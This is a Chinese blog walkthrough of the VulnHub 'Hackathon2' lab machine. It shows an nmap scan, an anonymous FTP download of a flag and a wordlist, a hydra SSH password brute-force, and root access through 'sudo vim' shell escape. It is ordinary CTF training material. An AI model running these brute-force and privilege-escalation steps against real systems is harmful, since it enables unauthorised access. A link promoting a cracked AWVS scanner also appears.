Vulnhub_Hackathon2


主机信息

kali:192.168.1.9
Hackathon2:192.168.1.13

信息收集

使用nmap探测目标主机开放的端口信息

nmap -T4 -A -v -p- 192.168.1.13


通过探测目标主机开放端口,发现开放了21端口并且可匿名登录,然后登录ftp查看文件

ftp> open 192.168.1.13
Connected to 192.168.1.13.
220 (vsFTPd 3.0.3)
Name (192.168.1.13:root): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 1000     1000           47 Jun 18 17:32 flag1.txt
-rw-r--r--    1 1000     1000          849 Jun 19 05:11 word.dir
226 Directory send OK.
ftp> get flag1.txt
local: flag1.txt remote: flag1.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for flag1.txt (47 bytes).
226 Transfer complete.
47 bytes received in 0.00 secs (19.7243 kB/s)
ftp> get word.dir
local: word.dir remote: word.dir
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for word.dir (849 bytes).
226 Transfer complete.
849 bytes received in 0.00 secs (877.3562 kB/s)
ftp> exit


查看从FTP获取的第一个Flag

查看word.dic发现是一个字典文件

通过目录扫描发现happy目录,访问查看源码发现用户名提示

GETSHELL

使用hydra进行爆破

hydra -L user_hackton2  -P word.dir 192.168.1.13 -s 7223 ssh


得到密码后登录执行sudo -l查看发现vim可利用

sudo -l

提权

使用vim提权

sudo vim 
:!/bin/bash


查看第二个flag

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值